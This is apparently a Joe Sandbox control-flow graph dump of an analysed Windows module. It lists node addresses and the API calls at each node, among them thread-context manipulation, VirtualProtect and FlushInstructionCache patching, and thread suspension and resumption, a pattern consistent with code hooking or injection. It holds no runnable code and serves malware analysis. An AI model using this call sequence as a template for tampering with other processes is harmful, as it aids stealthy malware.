1845b3b1ae2 StrCmpNIW 7622->7623 7624 1845b3b1b21 7622->7624 7623->7624 7625 1845b3b1afc lstrlenW 7623->7625 7624->7611 7625->7624 7626 1845b3b1b0e StrCpyW 7625->7626 7626->7624 7628 1845b3b3232 StrCpyW StrCatW 7627->7628 7629 1845b3b3249 PathCombineW 7627->7629 7630 1845b3b3252 7628->7630 7629->7630 7630->7615 7632 1845b3b1e63 7631->7632 7633 1845b3b1e6c 7631->7633 7634 1845b3b1554 2 API calls 7632->7634 7633->7615 7634->7633 8158 1845b3b7b70 8159 1845b3b7b79 __scrt_release_startup_lock 8158->8159 8161 1845b3b7b7d 8159->8161 8162 1845b3ba3e0 8159->8162 8163 1845b3ba400 8162->8163 8192 1845b3ba417 8162->8192 8164 1845b3ba41e 8163->8164 8165 1845b3ba408 8163->8165 8167 1845b3bcc38 27 API calls 8164->8167 8166 1845b3bb840 _set_errno_from_matherr 7 API calls 8165->8166 8168 1845b3ba40d 8166->8168 8169 1845b3ba423 8167->8169 8171 1845b3bb720 _invalid_parameter_noinfo 7 API calls 8168->8171 8193 1845b3bc3f0 GetModuleFileNameW 8169->8193 8171->8192 8175 1845b3ba380 7 API calls 8176 1845b3ba48d 8175->8176 8177 1845b3ba4ad 8176->8177 8178 1845b3ba495 8176->8178 8180 1845b3ba1c0 19 API calls 8177->8180 8179 1845b3bb840 _set_errno_from_matherr 7 API calls 8178->8179 8181 1845b3ba49a 8179->8181 8185 1845b3ba4c9 8180->8185 8183 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8181->8183 8182 1845b3ba4cf 8184 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8182->8184 8183->8192 8184->8192 8185->8182 8186 1845b3ba514 8185->8186 8187 1845b3ba4fb 8185->8187 8190 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8186->8190 8188 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8187->8188 8189 1845b3ba504 8188->8189 8191 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8189->8191 8190->8182 8191->8192 8192->8161 8194 1845b3bc436 try_get_function 8193->8194 8195 1845b3bc44a 8193->8195 8197 1845b3bb7d0 7 API calls 8194->8197 8196 1845b3babec 19 API calls 8195->8196 8201 1845b3bc478 8196->8201 8198 1845b3bc443 8197->8198 8200 1845b3b7a20 _handle_error 4 API calls 8198->8200 8202 1845b3ba43a 8200->8202 8209 1845b3bc2dc 8201->8209 8203 1845b3ba1c0 8202->8203 8205 1845b3ba1fe 8203->8205 8207 1845b3ba264 8205->8207 8218 1845b3bcfe8 8205->8218 8206 1845b3ba353 8206->8175 8207->8206 8208 1845b3bcfe8 19 API calls 8207->8208 8208->8207 8210 1845b3bc319 8209->8210 8214 1845b3bc300 8209->8214 8212 1845b3bc378 try_get_function 8210->8212 8213 1845b3bc31e 8210->8213 8211 1845b3bb840 _set_errno_from_matherr 7 API calls 8211->8214 8212->8214 8215 1845b3bb7d0 7 API calls 8212->8215 8213->8211 8213->8214 8214->8198 8216 1845b3bc385 8215->8216 8217 1845b3bb840 _set_errno_from_matherr 7 API calls 8216->8217 8217->8214 8219 1845b3bcf70 8218->8219 8220 1845b3babec 19 API calls 8219->8220 8221 1845b3bcf94 8220->8221 8221->8205 8451 1845b3b23f0 GetProcessIdOfThread GetCurrentProcessId 8452 1845b3b24be 8451->8452 8453 1845b3b2421 8451->8453 8458 1845b3b19ac OpenProcess 8453->8458 8456 1845b3b2433 CreateFileW 8456->8452 8457 1845b3b2477 WriteFile ReadFile CloseHandle 8456->8457 8457->8452 8459 1845b3b1a01 8458->8459 8460 1845b3b19d8 IsWow64Process 8458->8460 8459->8452 8459->8456 8461 1845b3b19ea 8460->8461 8462 1845b3b19f8 CloseHandle 8460->8462 8461->8462 8462->8459 7635 1845b3be2e8 7636 1845b3be2f3 7635->7636 7644 1845b3c0b44 7636->7644 7638 1845b3be2f8 7650 1845b3c0bf8 7638->7650 7641 1845b3be329 7642 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7641->7642 7643 1845b3be335 7642->7643 7649 1845b3c0b5d 7644->7649 7645 1845b3c0bdc 7645->7638 7646 1845b3c0ba7 DeleteCriticalSection 7648 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7646->7648 7648->7649 7649->7645 7649->7646 7654 1845b3c1340 7649->7654 7651 1845b3be30a DeleteCriticalSection 7650->7651 7652 1845b3c0c0b 7650->7652 7651->7638 7651->7641 7652->7651 7653 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7652->7653 7653->7651 7655 1845b3c1357 7654->7655 7657 1845b3c1375 7654->7657 7656 1845b3bb840 _set_errno_from_matherr 7 API calls 7655->7656 7658 1845b3c135c 7656->7658 7661 1845b3c1367 7657->7661 7662 1845b3c12bc 7657->7662 7659 1845b3bb720 _invalid_parameter_noinfo 7 API calls 7658->7659 7659->7661 7661->7649 7663 1845b3c12e3 7662->7663 7664 1845b3c12ce 7662->7664 7670 1845b3c12de 7663->7670 7678 1845b3be0f8 7663->7678 7665 1845b3bb840 _set_errno_from_matherr 7 API calls 7664->7665 7666 1845b3c12d3 7665->7666 7668 1845b3bb720 _invalid_parameter_noinfo 7 API calls 7666->7668 7668->7670 7670->7661 7671 1845b3c0bf8 7 API calls 7672 1845b3c12ff 7671->7672 7684 1845b3be54c 7672->7684 7677 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7677->7670 7679 1845b3be143 7678->7679 7680 1845b3be115 7678->7680 7679->7671 7680->7679 7681 1845b3be54c 7 API calls 7680->7681 7682 1845b3be136 7681->7682 7705 1845b3c0774 7682->7705 7685 1845b3be555 7684->7685 7689 1845b3be565 7684->7689 7686 1845b3bb840 _set_errno_from_matherr 7 API calls 7685->7686 7687 1845b3be55a 7686->7687 7688 1845b3bb720 _invalid_parameter_noinfo 7 API calls 7687->7688 7688->7689 7690 1845b3c1cd0 7689->7690 7691 1845b3c1ce0 7690->7691 7692 1845b3c1cf5 7690->7692 7694 1845b3bb820 7 API calls 7691->7694 7693 1845b3c1d51 7692->7693 7697 1845b3c1d24 7692->7697 7695 1845b3bb820 7 API calls 7693->7695 7696 1845b3c1ce5 7694->7696 7698 1845b3c1d56 7695->7698 7699 1845b3bb840 _set_errno_from_matherr 7 API calls 7696->7699 7830 1845b3c1c5c 7697->7830 7701 1845b3bb840 _set_errno_from_matherr 7 API calls 7698->7701 7703 1845b3c130e 7699->7703 7702 1845b3c1d5e 7701->7702 7704 1845b3bb720 _invalid_parameter_noinfo 7 API calls 7702->7704 7703->7670 7703->7677 7704->7703 7706 1845b3c079d 7705->7706 7707 1845b3c07b5 7705->7707 7708 1845b3bb820 7 API calls 7706->7708 7709 1845b3c082c 7707->7709 7714 1845b3c07e6 7707->7714 7710 1845b3c07a2 7708->7710 7711 1845b3bb820 7 API calls 7709->7711 7712 1845b3bb840 _set_errno_from_matherr 7 API calls 7710->7712 7713 1845b3c0831 7711->7713 7715 1845b3c07aa 7712->7715 7716 1845b3bb840 _set_errno_from_matherr 7 API calls 7713->7716 7719 1845b3c0812 7714->7719 7720 1845b3c07fd 7714->7720 7715->7679 7717 1845b3c0839 7716->7717 7718 1845b3bb720 _invalid_parameter_noinfo 7 API calls 7717->7718 7718->7715 7725 1845b3c0860 7719->7725 7721 1845b3bb840 _set_errno_from_matherr 7 API calls 7720->7721 7723 1845b3c0802 7721->7723 7724 1845b3bb820 7 API calls 7723->7724 7724->7715 7726 1845b3c088b 7725->7726 7764 1845b3c08a7 7725->7764 7727 1845b3c0890 7726->7727 7729 1845b3c08e1 7726->7729 7728 1845b3bb820 7 API calls 7727->7728 7731 1845b3c0895 7728->7731 7730 1845b3c08f7 7729->7730 7767 1845b3c1278 7729->7767 7777 1845b3c0c38 7730->7777 7734 1845b3bb840 _set_errno_from_matherr 7 API calls 7731->7734 7736 1845b3c089c 7734->7736 7738 1845b3bb720 _invalid_parameter_noinfo 7 API calls 7736->7738 7737 1845b3c0a16 7739 1845b3c0a28 7737->7739 7740 1845b3c0a75 WriteFile 7737->7740 7738->7764 7741 1845b3c0a61 7739->7741 7742 1845b3c0a2f 7739->7742 7753 1845b3c09ea try_get_function 7740->7753 7807 1845b3c03e4 7741->7807 7744 1845b3c0a4d 7742->7744 7745 1845b3c0a34 7742->7745 7743 1845b3bb228 19 API calls 7746 1845b3c0926 7743->7746 7801 1845b3c0604 7744->7801 7745->7753 7795 1845b3c04e8 7745->7795 7746->7737 7749 1845b3c094c GetConsoleMode 7746->7749 7749->7737 7751 1845b3c096e 7749->7751 7754 1845b3c09f8 7751->7754 7765 1845b3c0977 7751->7765 7752 1845b3c0aed 7757 1845b3bb840 _set_errno_from_matherr 7 API calls 7752->7757 7752->7764 7753->7752 7755 1845b3c0ada 7753->7755 7758 1845b3bb840 _set_errno_from_matherr 7 API calls 7753->7758 7753->7764 7785 1845b3bfef8 GetConsoleOutputCP 7754->7785 7759 1845b3bb7d0 7 API calls 7755->7759 7760 1845b3c0b0f 7757->7760 7761 1845b3c0acf 7758->7761 7759->7752 7762 1845b3bb820 7 API calls 7760->7762 7763 1845b3bb820 7 API calls 7761->7763 7762->7764 7763->7755 7764->7715 7765->7753 7766 1845b3c1280 CreateFileW WriteConsoleW CloseHandle CreateFileW WriteConsoleW 7765->7766 7766->7765 7768 1845b3c11dc 7767->7768 7813 1845b3bfd60 7768->7813 7771 1845b3c1201 7773 1845b3bb840 _set_errno_from_matherr 7 API calls 7771->7773 7772 1845b3c1212 SetFilePointerEx 7774 1845b3c1206 7772->7774 7775 1845b3c122a try_get_function 7772->7775 7773->7774 7774->7730 7776 1845b3bb7d0 7 API calls 7775->7776 7776->7774 7778 1845b3c0c41 7777->7778 7779 1845b3c0c4e 7777->7779 7780 1845b3bb840 _set_errno_from_matherr 7 API calls 7778->7780 7781 1845b3bb840 _set_errno_from_matherr 7 API calls 7779->7781 7782 1845b3c0903 7779->7782 7780->7782 7783 1845b3c0c85 7781->7783 7782->7737 7782->7743 7784 1845b3bb720 _invalid_parameter_noinfo 7 API calls 7783->7784 7784->7782 7786 1845b3babec 19 API calls 7785->7786 7793 1845b3bff7c 7786->7793 7787 1845b3b7a20 _handle_error 4 API calls 7788 1845b3c03b7 7787->7788 7788->7753 7790 1845b3c0209 WriteFile 7790->7793 7794 1845b3c01aa try_get_function 7790->7794 7791 1845b3c0d20 11 API calls 7791->7793 7792 1845b3c0250 WriteFile 7792->7793 7792->7794 7793->7790 7793->7791 7793->7792 7793->7794 7825 1845b3be620 7793->7825 7794->7787 7796 1845b3c0500 7795->7796 7798 1845b3c058f WriteFile 7796->7798 7800 1845b3c05cc try_get_function 7796->7800 7797 1845b3b7a20 _handle_error 4 API calls 7799 1845b3c05e9 7797->7799 7798->7796 7798->7800 7799->7753 7800->7797 7804 1845b3c0620 7801->7804 7802 1845b3b7a20 _handle_error 4 API calls 7803 1845b3c0758 7802->7803 7803->7753 7805 1845b3c06fa WriteFile 7804->7805 7806 1845b3c073d try_get_function 7804->7806 7805->7804 7805->7806 7806->7802 7808 1845b3c03fc 7807->7808 7811 1845b3c047a WriteFile 7808->7811 7812 1845b3c04b1 try_get_function 7808->7812 7809 1845b3b7a20 _handle_error 4 API calls 7810 1845b3c04ce 7809->7810 7810->7753 7811->7808 7811->7812 7812->7809 7814 1845b3bfd7e 7813->7814 7815 1845b3bfd69 7813->7815 7817 1845b3bb820 7 API calls 7814->7817 7822 1845b3bfd76 7814->7822 7816 1845b3bb820 7 API calls 7815->7816 7818 1845b3bfd6e 7816->7818 7819 1845b3bfdb9 7817->7819 7820 1845b3bb840 _set_errno_from_matherr 7 API calls 7818->7820 7821 1845b3bb840 _set_errno_from_matherr 7 API calls 7819->7821 7820->7822 7823 1845b3bfdc1 7821->7823 7822->7771 7822->7772 7824 1845b3bb720 _invalid_parameter_noinfo 7 API calls 7823->7824 7824->7822 7826 1845b3bb228 19 API calls 7825->7826 7827 1845b3be629 7826->7827 7828 1845b3be4e4 19 API calls 7827->7828 7829 1845b3be642 7828->7829 7829->7793 7831 1845b3c1c78 7830->7831 7832 1845b3c1ca2 7831->7832 7833 1845b3c1cab 7831->7833 7837 1845b3c1d74 7832->7837 7835 1845b3bb840 _set_errno_from_matherr 7 API calls 7833->7835 7836 1845b3c1ca7 7835->7836 7836->7703 7838 1845b3bfd60 7 API calls 7837->7838 7841 1845b3c1d88 7838->7841 7839 1845b3c1d8e try_get_function 7851 1845b3bfca4 7839->7851 7841->7839 7844 1845b3bfd60 7 API calls 7841->7844 7850 1845b3c1dcb 7841->7850 7842 1845b3bfd60 7 API calls 7845 1845b3c1dd7 CloseHandle 7842->7845 7847 1845b3c1dbe 7844->7847 7845->7839 7846 1845b3c1e1f 7846->7836 7849 1845b3bfd60 7 API calls 7847->7849 7848 1845b3bb7d0 7 API calls 7848->7846 7849->7850 7850->7839 7850->7842 7852 1845b3bfcc0 7851->7852 7853 1845b3bfd32 7851->7853 7852->7853 7858 1845b3bfcf3 7852->7858 7854 1845b3bb840 _set_errno_from_matherr 7 API calls 7853->7854 7855 1845b3bfd37 7854->7855 7856 1845b3bb820 7 API calls 7855->7856 7857 1845b3bfd24 7856->7857 7857->7846 7857->7848 7858->7857 7859 1845b3bfd1c SetStdHandle 7858->7859 7859->7857 7328 1845b3bb064 7329 1845b3bb069 7328->7329 7333 1845b3bb07e 7328->7333 7334 1845b3bb084 7329->7334 7332 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7332->7333 7335 1845b3bb0c6 7334->7335 7338 1845b3bb0ce 7334->7338 7336 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7335->7336 7336->7338 7337 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7339 1845b3bb0db 7337->7339 7338->7337 7340 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7339->7340 7341 1845b3bb0e8 7340->7341 7342 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7341->7342 7343 1845b3bb0f5 7342->7343 7344 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7343->7344 7345 1845b3bb102 7344->7345 7346 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7345->7346 7347 1845b3bb10f 7346->7347 7348 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7347->7348 7349 1845b3bb11c 7348->7349 7350 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7349->7350 7351 1845b3bb129 7350->7351 7352 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7351->7352 7353 1845b3bb139 7352->7353 7354 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7353->7354 7355 1845b3bb149 7354->7355 7360 1845b3baf34 7355->7360 7357 1845b3bb15e 7364 1845b3baeac 7357->7364 7359 1845b3bb076 7359->7332 7361 1845b3baf50 7360->7361 7362 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7361->7362 7363 1845b3baf80 7361->7363 7362->7363 7363->7357 7365 1845b3baec8 7364->7365 7366 1845b3bb17c Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7365->7366 7367 1845b3baed6 7366->7367 7367->7359 8463 1845b3ba9e4 8464 1845b3ba9fd 8463->8464 8466 1845b3baa15 8463->8466 8465 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8464->8465 8464->8466 8465->8466 7368 1845b3bd864 GetProcessHeap 7860 1845b3beee4 7861 1845b3bef03 7860->7861 7862 1845b3bef7c 7861->7862 7865 1845b3bef13 7861->7865 7868 1845b3b82e0 7862->7868 7866 1845b3b7a20 _handle_error 4 API calls 7865->7866 7867 1845b3bef72 7866->7867 7871 1845b3b82f4 IsProcessorFeaturePresent 7868->7871 7870 1845b3b82ee 7872 1845b3b830b 7871->7872 7875 1845b3b8390 RtlCaptureContext RtlLookupFunctionEntry 7872->7875 7874 1845b3b831f 7874->7870 7876 1845b3b83f2 7875->7876 7877 1845b3b83c0 RtlVirtualUnwind 7875->7877 7876->7874 7877->7876 8222 1845b3ba568 8223 1845b3ba57d 8222->8223 8224 1845b3ba581 8222->8224 8225 1845b3bcc38 27 API calls 8224->8225 8226 1845b3ba586 8225->8226 8234 1845b3bd130 GetEnvironmentStringsW 8226->8234 8229 1845b3ba593 8232 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8229->8232 8232->8223 8233 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8233->8229 8235 1845b3bd200 8234->8235 8238 1845b3bd15e 8234->8238 8236 1845b3ba58b 8235->8236 8237 1845b3bd20a FreeEnvironmentStringsW 8235->8237 8236->8229 8242 1845b3ba5d4 8236->8242 8237->8236 8238->8235 8239 1845b3bae0c 8 API calls 8238->8239 8241 1845b3bd1bf 8239->8241 8240 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8240->8235 8241->8240 8243 1845b3ba5fb 8242->8243 8244 1845b3bb860 _set_errno_from_matherr 7 API calls 8243->8244 8252 1845b3ba630 8244->8252 8245 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8246 1845b3ba5a0 8245->8246 8246->8233 8247 1845b3bb860 _set_errno_from_matherr 7 API calls 8247->8252 8248 1845b3ba690 8257 1845b3ba6dc 8248->8257 8250 1845b3bab34 __std_exception_copy 7 API calls 8250->8252 8252->8247 8252->8248 8252->8250 8254 1845b3ba6c7 8252->8254 8255 1845b3ba69f 8252->8255 8256 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8252->8256 8253 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8253->8255 8255->8245 8256->8252 8258 1845b3ba698 8257->8258 8259 1845b3ba6e1 8257->8259 8258->8253 8260 1845b3ba70a 8259->8260 8261 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8259->8261 8262 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8260->8262 8261->8259 8262->8258 7369 1845b3b385c 7372 1845b3b37ac 7369->7372 7373 1845b3b37bf GetModuleHandleW 7372->7373 7374 1845b3b3854 FreeLibraryAndExitThread 7372->7374 7375 1845b3b3840 TerminateThread 7373->7375 7376 1845b3b37d6 GetCurrentProcess VirtualProtectEx 7373->7376 7379 1845b3b200c 7375->7379 7376->7375 7377 1845b3b3802 GetCurrentProcess VirtualProtectEx 7376->7377 7377->7375 7406 1845b3b5b90 7379->7406 7383 1845b3b2028 7384 1845b3b2048 7383->7384 7416 1845b3b57f0 GetCurrentThreadId 7383->7416 7386 1845b3b57f0 5 API calls 7384->7386 7388 1845b3b2068 7384->7388 7386->7388 7387 1845b3b2088 7390 1845b3b20a8 7387->7390 7391 1845b3b57f0 5 API calls 7387->7391 7388->7387 7389 1845b3b57f0 5 API calls 7388->7389 7389->7387 7392 1845b3b20c8 7390->7392 7393 1845b3b57f0 5 API calls 7390->7393 7391->7390 7394 1845b3b20e8 7392->7394 7395 1845b3b57f0 5 API calls 7392->7395 7393->7392 7396 1845b3b2108 7394->7396 7397 1845b3b57f0 5 API calls 7394->7397 7395->7394 7398 1845b3b2128 7396->7398 7399 1845b3b57f0 5 API calls 7396->7399 7397->7396 7400 1845b3b2148 7398->7400 7401 1845b3b57f0 5 API calls 7398->7401 7399->7398 7402 1845b3b2168 7400->7402 7403 1845b3b57f0 5 API calls 7400->7403 7401->7400 7423 1845b3b5c10 7402->7423 7403->7402 7405 1845b3b5c0b 7405->7374 7407 1845b3b5ba4 7406->7407 7409 1845b3b201a GetCurrentThread 7406->7409 7407->7409 7446 1845b3b5110 7407->7446 7410 1845b3b60b0 7409->7410 7411 1845b3b60cd 7410->7411 7413 1845b3b60c2 7410->7413 7411->7413 7451 1845b3b7950 7411->7451 7413->7383 7414 1845b3b60ea 7414->7413 7415 1845b3b615d GetLastError 7414->7415 7415->7413 7417 1845b3b581d 7416->7417 7419 1845b3b5813 7416->7419 7418 1845b3b7950 2 API calls 7417->7418 7417->7419 7420 1845b3b5891 type_info::_name_internal_method 7418->7420 7419->7384 7420->7419 7421 1845b3b59a0 VirtualProtect 7420->7421 7421->7419 7422 1845b3b59c9 GetLastError 7421->7422 7422->7419 7424 1845b3b5c4b GetCurrentThreadId 7423->7424 7425 1845b3b5c39 7423->7425 7426 1845b3b5c62 7424->7426 7427 1845b3b5c58 7424->7427 7425->7424 7428 1845b3b5c6b 7426->7428 7432 1845b3b5c7b 7426->7432 7430 1845b3b7a20 _handle_error 4 API calls 7427->7430 7471 1845b3b5a40 GetCurrentThreadId 7428->7471 7431 1845b3b609f 7430->7431 7431->7405 7433 1845b3b5d9c GetThreadContext 7432->7433 7437 1845b3b5efa 7432->7437 7434 1845b3b5dc2 7433->7434 7433->7437 7434->7437 7439 1845b3b5de9 7434->7439 7435 1845b3b5fde 7438 1845b3b5ffe 7435->7438 7479 1845b3b44c0 7435->7479 7436 1845b3b5f21 VirtualProtect FlushInstructionCache 7436->7437 7437->7435 7437->7436 7483 1845b3b4ed0 GetCurrentProcess 7438->7483 7441 1845b3b5e6d 7439->7441 7443 1845b3b5e46 SetThreadContext 7439->7443 7441->7405 7443->7441 7444 1845b3b6017 ResumeThread 7445 1845b3b6003 7444->7445 7445->7427 7445->7444 7449 1845b3b5122 7446->7449 7447 1845b3b515f 7447->7409 7448 1845b3b5138 VirtualProtect 7448->7449 7450 1845b3b5156 GetLastError 7448->7450 7449->7447 7449->7448 7450->7447 7453 1845b3b795b _set_errno_from_matherr 7451->7453 7452 1845b3b7974 7452->7414 7453->7452 7454 1845b3b7985 7453->7454 7458 1845b3b817c 7453->7458 7462 1845b3b819c 7454->7462 7459 1845b3b818a std::bad_alloc::bad_alloc 7458->7459 7466 1845b3b94a4 7459->7466 7461 1845b3b819b 7463 1845b3b81aa std::bad_alloc::bad_alloc 7462->7463 7464 1845b3b94a4 Concurrency::cancel_current_task 2 API calls 7463->7464 7465 1845b3b798b 7464->7465 7467 1845b3b94c3 7466->7467 7468 1845b3b94e0 RtlPcToFileHeader 7466->7468 7467->7468 7469 1845b3b9507 RaiseException 7468->7469 7470 1845b3b94f8 7468->7470 7469->7461 7470->7469 7475 1845b3b5a5b 7471->7475 7477 1845b3b5a51 7471->7477 7472 1845b3b5a73 VirtualProtect 7472->7475 7473 1845b3b5b05 7474 1845b3b4ed0 3 API calls 7473->7474 7476 1845b3b5b15 7474->7476 7475->7472 7475->7473 7476->7477 7478 1845b3b5b29 ResumeThread 7476->7478 7477->7427 7478->7476 7481 1845b3b44dc 7479->7481 7480 1845b3b453f 7480->7438 7481->7480 7482 1845b3b44f2 VirtualFree 7481->7482 7482->7481 7484 1845b3b4eec 7483->7484 7485 1845b3b4f33 7484->7485 7486 1845b3b4f02 VirtualProtect FlushInstructionCache 7484->7486 7485->7445 7486->7484 7878 1845b3b24dc 7879 1845b3b255a 7878->7879 7880 1845b3b25c0 GetFileType 7879->7880 7887 1845b3b269d 7879->7887 7881 1845b3b25ce StrCpyW 7880->7881 7882 1845b3b25e2 7880->7882 7884 1845b3b25ef 7881->7884 7883 1845b3b1ab8 4 API calls 7882->7883 7883->7884 7885 1845b3b3930 StrCmpNIW 7884->7885 7886 1845b3b3200 4 API calls 7884->7886 7884->7887 7888 1845b3b1e4c 2 API calls 7884->7888 7885->7884 7886->7884 7888->7884 7889 1845b3b2cdc 7891 1845b3b2d4d 7889->7891 7890 1845b3b3090 7891->7890 7892 1845b3b2d79 GetModuleHandleA 7891->7892 7893 1845b3b2d8b try_get_function 7892->7893 7893->7890 7894 1845b3b2dc4 StrCmpNIW 7893->7894 7894->7890 7900 1845b3b2de9 7894->7900 7895 1845b3b1a14 6 API calls 7895->7900 7896 1845b3b2fb5 lstrlenW 7896->7900 7897 1845b3b2efb lstrlenW 7897->7900 7898 1845b3b3930 StrCmpNIW 7898->7900 7899 1845b3b1554 StrCmpIW StrCmpW 7899->7900 7900->7890 7900->7895 7900->7896 7900->7897 7900->7898 7900->7899 8272 1845b3bad54 8273 1845b3bad5c 8272->8273 8274 1845b3bd65c 4 API calls 8273->8274 8275 1845b3bad8d 8273->8275 8277 1845b3bad89 8273->8277 8274->8273 8278 1845b3badb8 8275->8278 8279 1845b3bade3 8278->8279 8280 1845b3bade7 8279->8280 8281 1845b3badc6 DeleteCriticalSection 8279->8281 8280->8277 8281->8279 8282 1845b3bf955 8283 1845b3bb840 _set_errno_from_matherr 7 API calls 8282->8283 8284 1845b3bf95a 8283->8284 8285 1845b3bb720 _invalid_parameter_noinfo 7 API calls 8284->8285 8286 1845b3bf965 8285->8286 8287 1845b3be356 8288 1845b3be392 8287->8288 8289 1845b3be384 8287->8289 8289->8288 8290 1845b3babec 19 API calls 8289->8290 8291 1845b3be3b0 8290->8291 8292 1845b3be3e0 8291->8292 8293 1845b3be3be 8291->8293 8292->8288 8301 1845b3c0c98 8292->8301 8298 1845b3c0ce4 8293->8298 8296 1845b3bb840 _set_errno_from_matherr 7 API calls 8296->8288 8297 1845b3be420 8297->8288 8297->8296 8304 1845b3c13a4 8298->8304 8302 1845b3babec 19 API calls 8301->8302 8303 1845b3c0cab 8302->8303 8303->8297 8306 1845b3c1401 8304->8306 8309 1845b3c140d 8304->8309 8305 1845b3b7a20 _handle_error 4 API calls 8308 1845b3c0cf7 8305->8308 8306->8305 8307 1845b3bb840 _set_errno_from_matherr 7 API calls 8307->8306 8308->8288 8309->8306 8309->8307 7901 1845b3b90d8 7904 1845b3b9108 _IsNonwritableInCurrentImage __except_validate_context_record 7901->7904 7902 1845b3b91f9 7903 1845b3b91c4 RtlUnwindEx 7903->7904 7904->7902 7904->7903 8310 1845b3bf353 8311 1845b3bf360 8310->8311 8312 1845b3bf375 8311->8312 8314 1845b3bf38e 8311->8314 8313 1845b3bb840 _set_errno_from_matherr 7 API calls 8312->8313 8315 1845b3bf37a 8313->8315 8316 1845b3bf385 8314->8316 8318 1845b3babec 19 API calls 8314->8318 8317 1845b3bb720 _invalid_parameter_noinfo 7 API calls 8315->8317 8317->8316 8318->8316 8467 1845b3b21cc 8469 1845b3b21fd 8467->8469 8468 1845b3b22e8 8469->8468 8470 1845b3b231d 8469->8470 8476 1845b3b2221 8469->8476 8471 1845b3b2322 8470->8471 8472 1845b3b2391 8470->8472 8485 1845b3b30b4 GetProcessHeap HeapAlloc 8471->8485 8472->8468 8475 1845b3b30b4 11 API calls 8472->8475 8474 1845b3b2263 StrCmpNIW 8474->8476 8475->8468 8476->8468 8476->8474 8478 1845b3b1d60 8476->8478 8479 1845b3b1d8f GetProcessHeap HeapAlloc 8478->8479 8480 1845b3b1e36 8478->8480 8481 1845b3b1dc5 8479->8481 8480->8476 8481->8480 8482 1845b3b1e18 GetProcessHeap HeapFree 8481->8482 8483 1845b3b1554 2 API calls 8481->8483 8482->8480 8483->8482 8490 1845b3b3107 8485->8490 8486 1845b3b31d1 GetProcessHeap HeapFree 8486->8468 8487 1845b3b31cc 8487->8486 8488 1845b3b315e StrCmpNIW 8488->8490 8489 1845b3b1d60 6 API calls 8489->8490 8490->8486 8490->8487 8490->8488 8490->8489 8491 1845b3b5dd0 8492 1845b3b5ddd 8491->8492 8493 1845b3b5de9 8492->8493 8498 1845b3b5efa 8492->8498 8494 1845b3b5e6d 8493->8494 8495 1845b3b5e46 SetThreadContext 8493->8495 8495->8494 8496 1845b3b5fde 8499 1845b3b5ffe 8496->8499 8501 1845b3b44c0 VirtualFree 8496->8501 8497 1845b3b5f21 VirtualProtect FlushInstructionCache 8497->8498 8498->8496 8498->8497 8500 1845b3b4ed0 3 API calls 8499->8500 8504 1845b3b6003 8500->8504 8501->8499 8502 1845b3b6057 8505 1845b3b7a20 _handle_error 4 API calls 8502->8505 8503 1845b3b6017 ResumeThread 8503->8504 8504->8502 8504->8503 8506 1845b3b609f 8505->8506 8507 1845b3be1c8 8508 1845b3be1f2 8507->8508 8509 1845b3bb860 _set_errno_from_matherr 7 API calls 8508->8509 8510 1845b3be211 8509->8510 8511 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8510->8511 8512 1845b3be21f 8511->8512 8513 1845b3bb860 _set_errno_from_matherr 7 API calls 8512->8513 8516 1845b3be249 8512->8516 8515 1845b3be23b 8513->8515 8514 1845b3bd65c 4 API calls 8514->8516 8517 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8515->8517 8516->8514 8518 1845b3be252 8516->8518 8517->8516 8519 1845b3b2bc4 8521 1845b3b2c21 8519->8521 8520 1845b3b2c3c 8521->8520 8522 1845b3b33b0 3 API calls 8521->8522 8522->8520 7905 1845b3bdac4 7908 1845b3bdad0 7905->7908 7907 1845b3bdaf7 7908->7907 7909 1845b3bfb5c 7908->7909 7910 1845b3bfb61 7909->7910 7911 1845b3bfb9c 7909->7911 7912 1845b3bfb82 DeleteCriticalSection 7910->7912 7913 1845b3bfb94 7910->7913 7911->7908 7912->7912 7912->7913 7914 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7913->7914 7914->7911

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001F.00000002.2946625946.000001845B3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001845B3B0000, based on PE: true
                                                Joe Sandbox IDA Plugin
